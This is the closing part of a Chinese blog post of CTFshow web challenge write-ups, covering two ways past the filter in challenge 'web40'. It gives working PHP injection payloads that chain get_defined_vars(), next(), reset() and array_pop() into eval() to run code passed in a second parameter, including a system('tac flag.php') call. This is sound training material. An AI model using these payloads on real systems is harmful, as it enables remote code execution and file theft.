<h3 id="solution3"><a href="#solution3" class="headerlink" title="solution3"></a>solution3</h3><p>视频给了另外的方法<br>也学习到了很多新东西</p>
<ul>
<li>get_defined_vars() 返回一个包含所有已定义变量的多维数组。这些变量包括环境变量、服务器变量和用户定义的变量，例如GET、POST、FILE等等。</li>
<li>next()将内部指针指向数组中的下一个元素，并输出。</li>
<li>array_pop() 函数删除数组中的最后一个元素并返回其值。</li>
</ul>
<p>传入 <code>/?c=print_r(get_defined_vars());</code> 来打印所有变量<br>这里我们再POST一个a&#x3D;phpinfo();<br>通过  <code>next(get_defined_vars())</code>可以得到 <code>Array ( [a] =&gt; phpinfo(); )  拿到这个数组后 利用array_pop可以弹出数组中的内容 也就是我们需要的phpinfo(); </code>array_pop(next(get_defined_vars()))<code>所以构造payload</code>&#x2F;?c&#x3D;eval(array_pop(next(get_defined_vars())));&#96; 即可执行<br>接下来只需要把 POST的值改一改就能RCE了<br>注意POST传的值结尾要有分号！</p>
<h3 id="solution4"><a href="#solution4" class="headerlink" title="solution4"></a>solution4</h3><p><code>?c=eval(next(reset(get_defined_vars())));&amp;1=;system(&quot;tac%20flag.php&quot;);</code><br>跟读取post参数类似，直接读get参数然后分离出来执行</p>

    </div>

    
    
    
  <div>  <div>
    
        <div style="text-align:center;color: #ccc;font-size:17px;">------------EOF------------</div>
    
</div> </div>
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>U-L-G-A-N-O-Y
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://u-l-g-a-n-o-y.github.io/2023/12/04/web-CTFshow/" title="web-CTFshow">http://u-l-g-a-n-o-y.github.io/2023/12/04/web-CTFshow/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/12/04/Crypto-Other/" rel="prev" title="Crypto-Other">
      <i class="fa fa-chevron-left"></i> Crypto-Other
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="nav-text">信息搜集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web1-%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2"><span class="nav-text">web1 源码泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web2-%E5%89%8D%E5%8F%B0JS%E7%BB%95%E8%BF%87"><span class="nav-text">web2 前台JS绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web3-%E5%8D%8F%E8%AE%AE%E5%A4%B4%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="nav-text">web3 协议头信息泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web4-robots%E5%90%8E%E5%8F%B0%E6%B3%84%E9%9C%B2"><span class="nav-text">web4 robots后台泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web5-phps%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2"><span class="nav-text">web5 phps源码泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web6-%E6%BA%90%E7%A0%81%E5%8E%8B%E7%BC%A9%E5%8C%85%E6%B3%84%E9%9C%B2"><span class="nav-text">web6 源码压缩包泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web7-%E7%89%88%E6%9C%AC%E6%8E%A7%E5%88%B6%E6%B3%84%E9%9C%B2%E6%BA%90%E7%A0%81"><span class="nav-text">web7 版本控制泄露源码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web8-%E7%89%88%E6%9C%AC%E6%8E%A7%E5%88%B6%E6%B3%84%E9%9C%B2%E6%BA%90%E7%A0%812"><span class="nav-text">web8 版本控制泄露源码2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web9-vim%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2"><span class="nav-text">web9 vim临时文件泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web10-cookie%E6%B3%84%E9%9C%B2"><span class="nav-text">web10 cookie泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web11-%E5%9F%9F%E5%90%8Dtxt%E8%AE%B0%E5%BD%95%E6%B3%84%E9%9C%B2"><span class="nav-text">web11 域名txt记录泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web12-%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E5%85%AC%E5%B8%83"><span class="nav-text">web12 敏感信息公布</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web13-%E5%86%85%E9%83%A8%E6%8A%80%E6%9C%AF%E6%96%87%E6%A1%A3%E6%B3%84%E9%9C%B2"><span class="nav-text">web13 内部技术文档泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web14-%E7%BC%96%E8%BE%91%E5%99%A8%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93"><span class="nav-text">web14 编辑器配置不当</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web15-%E5%AF%86%E7%A0%81%E9%80%BB%E8%BE%91%E8%84%86%E5%BC%B1"><span class="nav-text">web15 密码逻辑脆弱</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web16-%E6%8E%A2%E9%92%88%E6%B3%84%E9%9C%B2"><span class="nav-text">web16 探针泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web17-CDN%E7%A9%BF%E9%80%8F"><span class="nav-text">web17 CDN穿透</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web18-js%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="nav-text">web18 js敏感信息泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web19-%E5%89%8D%E7%AB%AF%E5%AF%86%E9%92%A5%E6%B3%84%E9%9C%B2"><span class="nav-text">web19 前端密钥泄露</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web20-%E6%95%B0%E6%8D%AE%E5%BA%93%E6%81%B6%E6%84%8F%E4%B8%8B%E8%BD%BD"><span class="nav-text">web20 数据库恶意下载</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%88%86%E7%A0%B4"><span class="nav-text">爆破</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web29"><span class="nav-text">web29</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web30"><span class="nav-text">web30</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web31"><span class="nav-text">web31</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web32"><span class="nav-text">web32</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web33"><span class="nav-text">web33</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web34"><span class="nav-text">web34</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web35"><span class="nav-text">web35</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web36"><span class="nav-text">web36</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web37"><span class="nav-text">web37</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web38"><span class="nav-text">web38</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web39"><span class="nav-text">web39</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web40"><span class="nav-text">web40</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#solution1"><span class="nav-text">solution1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#solution2"><span class="nav-text">solution2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#solution3"><span class="nav-text">solution3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#solution4"><span class="nav-text">solution4</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="U-L-G-A-N-O-Y"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">U-L-G-A-N-O-Y</p>
  <div class="site-description" itemprop="description">Laus Deo</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">U-L-G-A-N-O-Y</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">19k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">34 分钟</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


  <script async src="/js/cursor/fireworks.js"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"superSample":2,"position":"right","width":180,"height":288,"hOffset":110,"vOffset":-30},"mobile":{"show":true}});</script></body>
</html>

<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>

<!-- 雪花特效2 -->
<script type="text/javascript" src="/js/snow2.js"></script>
